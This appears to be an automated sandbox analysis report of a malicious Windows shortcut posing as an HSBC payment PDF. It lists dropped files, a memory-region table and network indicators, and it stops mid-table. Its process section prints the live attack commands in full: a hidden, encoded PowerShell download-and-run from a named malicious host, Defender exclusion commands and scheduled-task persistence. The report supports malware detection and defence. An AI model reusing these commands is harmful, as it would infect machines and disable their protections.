Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Payment Advice__HSBC Banking.pdf.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon
number=18, Archive, ctime=Sun Jun 16 18:18:31 2024, mtime=Fri Jul 26 03:50:06 2024, atime=Sun Jun 16 18:18:31 2024, length=245760,
window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\tmpE952.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\HODoCxSdp.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\PuttyTest777.pif
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x1a25a0b6, page size 16384, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HODoCxSdp.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PuttyTest777.pif.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zy55qri.qgb.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dp1jvjz.432.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2llw0zql.j5t.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ybtkso1.xqh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlgirj2j.rpj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnout0tx.qs1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlpuauit.oxa.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_reosc51j.doy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcqjsk1m.f0h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfvjlsdp.w0v.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmpF9EC.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 14 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
|
|
|
|
C:\Users\user\AppData\Roaming\PuttyTest777.pif
|
"C:\Users\user\AppData\Roaming\PuttyTest777.pif"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp"
|
|
|
|
C:\Users\user\AppData\Roaming\PuttyTest777.pif
|
"C:\Users\user\AppData\Roaming\PuttyTest777.pif"
|
|
|
|
C:\Users\user\AppData\Roaming\HODoCxSdp.exe
|
C:\Users\user\AppData\Roaming\HODoCxSdp.exe
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpF9EC.tmp"
|
|
|
|
C:\Users\user\AppData\Roaming\HODoCxSdp.exe
|
"C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\HODoCxSdp.exe
|
"C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 8 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
204.10.160.230
|
|
||
|
http://www.fontbureau.com/designersG
|
unknown
|
||
|
http://www.fontbureau.com/designers/?
|
unknown
|
||
|
http://www.founder.com.cn/cn/bThe
|
unknown
|
||
|
http://www.fontbureau.com/designers?
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://geoplugin.net/json.gp2
|
unknown
|
||
|
http://www.tiro.com
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
http://www.fontbureau.com/designers
|
unknown
|
||
|
http://www.goodfont.co.kr
|
unknown
|
||
|
https://remisat.com.uy
|
unknown
|
||
|
http://remisat.com.uy
|
unknown
|
||
|
http://www.sajatypeworks.com
|
unknown
|
||
|
http://www.typography.netD
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
|
http://www.founder.com.cn/cn/cThe
|
unknown
|
||
|
http://www.galapagosdesign.com/staff/dennis.htm
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://www.galapagosdesign.com/DPlease
|
unknown
|
||
|
http://www.fonts.com
|
unknown
|
||
|
http://www.sandoll.co.kr
|
unknown
|
||
|
http://www.urwpp.deDPlease
|
unknown
|
||
|
http://www.zhongyicts.com.cn
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.sakkal.com
|
unknown
|
||
|
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://www.fontbureau.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://www.chiark.greenend.org.uk/~sgtatham/putty/0
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.carterandcone.coml
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://www.fontbureau.com/designers/cabarga.htmlN
|
unknown
|
||
|
http://www.founder.com.cn/cn
|
unknown
|
||
|
http://www.fontbureau.com/designers/frere-user.html
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
|
http://www.jiyu-kobo.co.jp/
|
unknown
|
||
|
https://remisat.com.uy/zti/hot.exe
|
192.254.232.209
|
||
|
http://www.fontbureau.com/designers8
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
There are 41 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
geoplugin.net
|
178.237.33.50
|
||
|
remisat.com.uy
|
192.254.232.209
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
204.10.160.230
|
unknown
|
Canada
|
|
|
|
192.254.232.209
|
remisat.com.uy
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-O7QOC3
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-O7QOC3
|
licence
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
|
SlowContextMenuEntries
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3869000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
3729000
|
trusted library allocation
|
page read and write
|
|
|
|
1238000
|
heap
|
page read and write
|
|
|
|
104A000
|
heap
|
page read and write
|
|
|
|
471000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
D75AFE000
|
unkown
|
page readonly
|
||
|
4E90000
|
trusted library allocation
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
A46E000
|
stack
|
page read and write
|
||
|
4A4D000
|
trusted library allocation
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
1230000
|
heap
|
page read and write
|
||
|
27C1000
|
trusted library allocation
|
page read and write
|
||
|
1CCF44DD000
|
heap
|
page read and write
|
||
|
CC0000
|
trusted library allocation
|
page read and write
|
||
|
1CCF44D1000
|
heap
|
page read and write
|
||
|
1CC81C31000
|
trusted library allocation
|
page read and write
|
||
|
D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
9661000
|
heap
|
page read and write
|
||
|
CCA000
|
trusted library allocation
|
page execute and read and write
|
||
|
16FF0F0E000
|
heap
|
page read and write
|
||
|
1010000
|
heap
|
page read and write
|
||
|
2630000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
120D000
|
stack
|
page read and write
|
||
|
16FEB8FE000
|
heap
|
page read and write
|
||
|
1CCF6712000
|
heap
|
page read and write
|
||
|
A36E000
|
stack
|
page read and write
|
||
|
16FF0CD5000
|
trusted library allocation
|
page read and write
|
||
|
4FE0000
|
trusted library allocation
|
page read and write
|
||
|
1CCF4720000
|
heap
|
page read and write
|
||
|
16FF0D90000
|
remote allocation
|
page read and write
|
||
|
1CCF451C000
|
heap
|
page read and write
|
||
|
26A0000
|
heap
|
page read and write
|
||
|
4D20000
|
heap
|
page read and write
|
||
|
1CCF67D9000
|
heap
|
page read and write
|
||
|
A00E000
|
stack
|
page read and write
|
||
|
16A000
|
unkown
|
page readonly
|
||
|
F50000
|
heap
|
page read and write
|
||
|
9E7E000
|
stack
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D8000
|
heap
|
page read and write
|
||
|
D1C000
|
stack
|
page read and write
|
||
|
A0EE000
|
stack
|
page read and write
|
||
|
1CC80001000
|
trusted library allocation
|
page read and write
|
||
|
2DCF000
|
stack
|
page read and write
|
||
|
6CE000
|
stack
|
page read and write
|
||
|
27D4000
|
trusted library section
|
page readonly
|
||
|
870000
|
heap
|
page read and write
|
||
|
10FD000
|
stack
|
page read and write
|
||
|
1CCF621E000
|
heap
|
page read and write
|
||
|
16FF0D0A000
|
trusted library allocation
|
page read and write
|
||
|
4F8000
|
stack
|
page read and write
|
||
|
1CCF4420000
|
heap
|
page read and write
|
||
|
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
|
6CF7000
|
trusted library allocation
|
page read and write
|
||
|
ABD000
|
trusted library allocation
|
page execute and read and write
|
||
|
16FF2000000
|
heap
|
page read and write
|
||
|
7FFD9B752000
|
trusted library allocation
|
page read and write
|
||
|
16FEC5F0000
|
trusted library allocation
|
page read and write
|
||
|
1CCF4460000
|
trusted library allocation
|
page read and write
|
||
|
1CC90070000
|
trusted library allocation
|
page read and write
|
||
|
A10E000
|
stack
|
page read and write
|
||
|
16FF0CD0000
|
trusted library allocation
|
page read and write
|
||
|
2773000
|
trusted library allocation
|
page read and write
|
||
|
D80000
|
heap
|
page read and write
|
||
|
52D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24BFE7E000
|
stack
|
page read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
|
68E000
|
stack
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
AA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
16FF0F02000
|
heap
|
page read and write
|
||
|
954E000
|
stack
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
2680000
|
trusted library section
|
page readonly
|
||
|
24C0337000
|
stack
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
12AE000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
16FEB828000
|
heap
|
page read and write
|
||
|
2770000
|
trusted library allocation
|
page read and write
|
||
|
A90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
9650000
|
heap
|
page read and write
|
||
|
16FF0C5F000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
|
25DC000
|
stack
|
page read and write
|
||
|
6F7E000
|
stack
|
page read and write
|
||
|
16FF0D50000
|
trusted library allocation
|
page read and write
|
||
|
128F000
|
heap
|
page read and write
|
||
|
16FF0BF0000
|
trusted library allocation
|
page read and write
|
||
|
6F5000
|
heap
|
page read and write
|
||
|
1CC81B6B000
|
trusted library allocation
|
page read and write
|
||
|
4EA0000
|
heap
|
page execute and read and write
|
||
|
9FCE000
|
stack
|
page read and write
|
||
|
24C0438000
|
stack
|
page read and write
|
||
|
1CCF44CE000
|
heap
|
page read and write
|
||
|
F40000
|
heap
|
page read and write
|
||
|
2B3C000
|
trusted library allocation
|
page read and write
|
||
|
16FEB8B5000
|
heap
|
page read and write
|
||
|
16FEB8AF000
|
heap
|
page read and write
|
||
|
1CCF61E0000
|
heap
|
page execute and read and write
|
||
|
6D2E000
|
stack
|
page read and write
|
||
|
4A3C000
|
stack
|
page read and write
|
||
|
3410000
|
heap
|
page read and write
|
||
|
389E000
|
trusted library allocation
|
page read and write
|
||
|
1CCF5DB0000
|
heap
|
page read and write
|
||
|
16FEB906000
|
heap
|
page read and write
|
||
|
25FE000
|
trusted library allocation
|
page read and write
|
||
|
16FEB610000
|
heap
|
page read and write
|
||
|
3AA0000
|
trusted library allocation
|
page read and write
|
||
|
B77000
|
heap
|
page read and write
|
||
|
16FEB8AA000
|
heap
|
page read and write
|
||
|
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
|
1CCF647B000
|
heap
|
page read and write
|
||
|
24C124C000
|
stack
|
page read and write
|
||
|
16FF0C20000
|
trusted library allocation
|
page read and write
|
||
|
1CCF677D000
|
heap
|
page read and write
|
||
|
E74000
|
trusted library allocation
|
page read and write
|
||
|
E70000
|
trusted library allocation
|
page read and write
|
||
|
5010000
|
trusted library allocation
|
page execute and read and write
|
||
|
16FEBE02000
|
heap
|
page read and write
|
||
|
D9C000
|
stack
|
page read and write
|
||
|
16FF0C93000
|
trusted library allocation
|
page read and write
|
||
|
1CC815E1000
|
trusted library allocation
|
page read and write
|
||
|
24C063B000
|
stack
|
page read and write
|
||
|
471000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9B806000
|
trusted library allocation
|
page read and write
|
||
|
4E80000
|
trusted library allocation
|
page execute and read and write
|
||
|
16FF0EFD000
|
heap
|
page read and write
|
||
|
1CCF5D50000
|
trusted library allocation
|
page read and write
|
||
|
1CC81351000
|
trusted library allocation
|
page read and write
|
||
|
5277000
|
trusted library allocation
|
page read and write
|
||
|
16FF0CB2000
|
trusted library allocation
|
page read and write
|
||
|
DFE000
|
stack
|
page read and write
|
||
|
E60000
|
trusted library allocation
|
page read and write
|
||
|
16FF0D90000
|
remote allocation
|
page read and write
|
||
|
16FF0D40000
|
trusted library allocation
|
page read and write
|
||
|
D10000
|
heap
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
275D000
|
trusted library allocation
|
page read and write
|
||
|
16FEB874000
|
heap
|
page read and write
|
||
|
6E40000
|
trusted library section
|
page read and write
|
||
|
16FEB82B000
|
heap
|
page read and write
|
||
|
D5E000
|
stack
|
page read and write
|
||
|
1CC8008B000
|
trusted library allocation
|
page read and write
|
||
|
4D17000
|
heap
|
page read and write
|
||
|
94E000
|
stack
|
page read and write
|
||
|
870000
|
trusted library allocation
|
page read and write
|
||
|
B67000
|
heap
|
page read and write
|
||
|
D74AFE000
|
unkown
|
page readonly
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
D73E7B000
|
stack
|
page read and write
|
||
|
AA4000
|
trusted library allocation
|
page read and write
|
||
|
34DB000
|
heap
|
page read and write
|
||
|
842000
|
trusted library allocation
|
page read and write
|
||
|
4E70000
|
heap
|
page read and write
|
||
|
830000
|
trusted library allocation
|
page read and write
|
||
|
4E6E000
|
stack
|
page read and write
|
||
|
1CC815E4000
|
trusted library allocation
|
page read and write
|
||
|
AAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
12B3000
|
heap
|
page read and write
|
||
|
4CD0000
|
heap
|
page read and write
|
||
|
940E000
|
stack
|
page read and write
|
||
|
16FF0E8E000
|
heap
|
page read and write
|
||
|
16FF0C46000
|
trusted library allocation
|
page read and write
|
||
|
FBD000
|
stack
|
page read and write
|
||
|
4D10000
|
heap
|
page read and write
|
||
|
2F3D000
|
stack
|
page read and write
|
||
|
4D3D000
|
trusted library allocation
|
page read and write
|
||
|
24BFEFE000
|
stack
|
page read and write
|
||
|
4A90000
|
trusted library allocation
|
page read and write
|
||
|
5270000
|
trusted library allocation
|
page read and write
|
||
|
16FEB8FE000
|
heap
|
page read and write
|
||
|
4D63000
|
heap
|
page read and write
|
||
|
6D20000
|
trusted library allocation
|
page execute and read and write
|
||
|
70FE000
|
stack
|
page read and write
|
||
|
5AD000
|
stack
|
page read and write
|
||
|
16FF0F06000
|
heap
|
page read and write
|
||
|
D759FB000
|
stack
|
page read and write
|
||
|
3CC6000
|
trusted library allocation
|
page read and write
|
||
|
969000
|
heap
|
page read and write
|
||
|
5000000
|
trusted library allocation
|
page read and write
|
||
|
24C007D000
|
stack
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
16FF0EF2000
|
heap
|
page read and write
|
||
|
B6C000
|
heap
|
page read and write
|
||
|
16FEBDA0000
|
trusted library allocation
|
page read and write
|
||
|
16FEBE00000
|
heap
|
page read and write
|
||
|
24C053E000
|
stack
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
3D7D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
CC2000
|
trusted library allocation
|
page read and write
|
||
|
2C4E000
|
stack
|
page read and write
|
||
|
16FEB89C000
|
heap
|
page read and write
|
||
|
382E000
|
stack
|
page read and write
|
||
|
ACE000
|
heap
|
page read and write
|
||
|
9ECD000
|
stack
|
page read and write
|
||
|
16FEB891000
|
heap
|
page read and write
|
||
|
1CCF44EF000
|
heap
|
page read and write
|
||
|
6CF0000
|
trusted library allocation
|
page read and write
|
||
|
9890000
|
heap
|
page read and write
|
||
|
1330000
|
heap
|
page read and write
|
||
|
84A000
|
trusted library allocation
|
page execute and read and write
|
||
|
16FF0C7E000
|
trusted library allocation
|
page read and write
|
||
|
4D4E000
|
heap
|
page read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
66A0000
|
trusted library allocation
|
page read and write
|
||
|
9F86000
|
heap
|
page read and write
|
||
|
1CCF63E0000
|
heap
|
page execute and read and write
|
||
|
9AFD000
|
stack
|
page read and write
|
||
|
9ACE000
|
stack
|
page read and write
|
||
|
7FE000
|
stack
|
page read and write
|
||
|
950F000
|
stack
|
page read and write
|
||
|
1CCF4725000
|
heap
|
page read and write
|
||
|
6D30000
|
trusted library section
|
page read and write
|
||
|
A7F000
|
stack
|
page read and write
|
||
|
2BAF000
|
stack
|
page read and write
|
||
|
2690000
|
heap
|
page read and write
|
||
|
810000
|
trusted library allocation
|
page read and write
|
||
|
16FF0E62000
|
heap
|
page read and write
|
||
|
2CC0000
|
heap
|
page read and write
|
||
|
16FF11D0000
|
trusted library allocation
|
page read and write
|
||
|
AB0000
|
trusted library allocation
|
page read and write
|
||
|
16FF0B70000
|
trusted library allocation
|
page read and write
|
||
|
16FF0CEF000
|
trusted library allocation
|
page read and write
|
||
|
16FEB822000
|
heap
|
page read and write
|
||
|
1CCF4480000
|
trusted library allocation
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
D7607E000
|
stack
|
page read and write
|
||
|
5060000
|
heap
|
page read and write
|
||
|
5EA000
|
stack
|
page read and write
|
||
|
852000
|
trusted library allocation
|
page read and write
|
||
|
16FF0C20000
|
trusted library allocation
|
page read and write
|
||
|
16FF0C5C000
|
trusted library allocation
|
page read and write
|
||
|
16FF0BFE000
|
trusted library allocation
|
page read and write
|
||
|
16FF0CC0000
|
trusted library allocation
|
page read and write
|
||
|
1CCF6200000
|
heap
|
page read and write
|
||
|
4A49000
|
trusted library allocation
|
page read and write
|
||
|
8C0000
|
trusted library allocation
|
page read and write
|
||
|
16FF0C62000
|
trusted library allocation
|
page read and write
|
||
|
B4B000
|
stack
|
page read and write
|
||
|
D90000
|
heap
|
page read and write
|
||
|
1CCF4518000
|
heap
|
page read and write
|
||
|
12A8000
|
heap
|
page read and write
|
||
|
16FF0ED3000
|
heap
|
page read and write
|
||
|
823000
|
trusted library allocation
|
page execute and read and write
|
||
|
50C0000
|
trusted library section
|
page read and write
|
||
|
A1EE000
|
stack
|
page read and write
|
||
|
16FEB8B5000
|
heap
|
page read and write
|
||
|
16FEB913000
|
heap
|
page read and write
|
||
|
70BE000
|
stack
|
page read and write
|
||
|
2ECF000
|
stack
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
840000
|
trusted library allocation
|
page read and write
|
||
|
E76000
|
trusted library allocation
|
page read and write
|
||
|
4CD5000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
B50000
|
trusted library allocation
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
2744000
|
trusted library allocation
|
page read and write
|
||
|
274E000
|
trusted library allocation
|
page read and write
|
||
|
66C2000
|
trusted library allocation
|
page read and write
|
||
|
7DF482EB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
DEE000
|
stack
|
page read and write
|
||
|
1CC90001000
|
trusted library allocation
|
page read and write
|
||
|
1CCF67A9000
|
heap
|
page read and write
|
||
|
1CCF6781000
|
heap
|
page read and write
|
||
|
13FF000
|
stack
|
page read and write
|
||
|
50B0000
|
heap
|
page read and write
|
||
|
1CCF63F0000
|
heap
|
page read and write
|
||
|
39DE000
|
trusted library allocation
|
page read and write
|
||
|
B00000
|
heap
|
page read and write
|
||
|
126E000
|
heap
|
page read and write
|
||
|
1CCF65F0000
|
heap
|
page read and write
|
||
|
16FF0EF8000
|
heap
|
page read and write
|
||
|
16FF0BD0000
|
trusted library allocation
|
page read and write
|
||
|
2610000
|
trusted library allocation
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
16FF0C34000
|
trusted library allocation
|
page read and write
|
||
|
5310000
|
trusted library allocation
|
page read and write
|
||
|
9D3E000
|
stack
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
D760FE000
|
unkown
|
page readonly
|
||
|
987F000
|
stack
|
page read and write
|
||
|
9F91000
|
heap
|
page read and write
|
||
|
1CCF6A60000
|
heap
|
page read and write
|
||
|
D741F7000
|
stack
|
page read and write
|
||
|
24C13CB000
|
stack
|
page read and write
|
||
|
CD2000
|
trusted library allocation
|
page read and write
|
||
|
CC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A70000
|
heap
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
16FF0BF0000
|
